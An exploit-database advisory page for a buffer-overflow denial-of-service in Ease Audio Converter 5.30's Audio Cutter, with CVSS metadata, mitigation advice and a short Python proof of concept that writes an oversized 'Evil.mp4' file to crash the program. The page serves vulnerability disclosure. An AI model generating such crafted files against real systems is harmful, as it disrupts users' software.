Ease Audio Converter 5.30 Audio Cutter Dos Exploit

vendor:

Ease Audio Converter

by:

Achilles

7.8

CVSS

HIGH

Denial of Service

119

CWE

Product Name: Ease Audio Converter

Affected Version From: 5.30

Affected Version To: 5.30

Patch Exists: Yes

Related CWE: N/A

CPE: a:audiotool:ease_audio_converter

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 x64 Sp1

2019

Ease Audio Converter 5.30 Audio Cutter Dos Exploit

A buffer overflow vulnerability exists in Ease Audio Converter 5.30 when a specially crafted MP4 file is loaded into the Audio Cutter function. This can lead to a denial of service condition.

Mitigation:

Upgrade to the latest version of Ease Audio Converter.

Source

Exploit-DB raw data:

# Exploit Title: Ease Audio Converter 5.30 Audio Cutter Dos Exploit
# Date: 19.04.19
# Vendor Homepage:http://www.audiotool.net/download.htm
# Software Link:  http://www.audiotool.net/download/audioconverter.exe
# Exploit Author: Achilles
# Tested Version: 5.30
# Tested on: Windows 7 x64 Sp1

# 1.- Run the python script, it will create a new file with the name "Evil.mp4"
# 2.- Open AudioConverter.exe and Click Function and choose Audio Cutter
# 3.- Load the file "Evil.mp4"
# 4.- Click ok
# 5.- Click Gut
# 5.- And you will see a crash.



#!/usr/bin/env python
buffer = "\x41" * 6000

try:
	f=open("Evil.mp4","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"